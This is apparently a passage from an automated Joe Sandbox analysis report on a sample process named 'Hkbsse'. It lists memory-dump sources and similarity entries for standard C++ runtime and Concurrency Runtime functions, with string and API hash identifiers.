                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042360C
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pScheduler$version
                    • API String ID: 2141394445-3154422776
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044A266C
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 044A2682
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 044A2BB8
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 044A2BCC
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 044A2BED
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044A2C56
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044A2DC4
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
                    • String ID: @[F
                    • API String ID: 3302332639-1227568360
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 004024BE
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040259E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    APIs
                    • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 00430CFA
                      • Part of subcall function 0042D9C0: Concurrency::details::ContextBase::~ContextBase.LIBCMT ref: 0042D9F9
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: Context$BaseBase::~Concurrency::details::Internal
                    • String ID: B$B
                    • API String ID: 1065816584-1850355789
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00402E1D
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00402E26
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550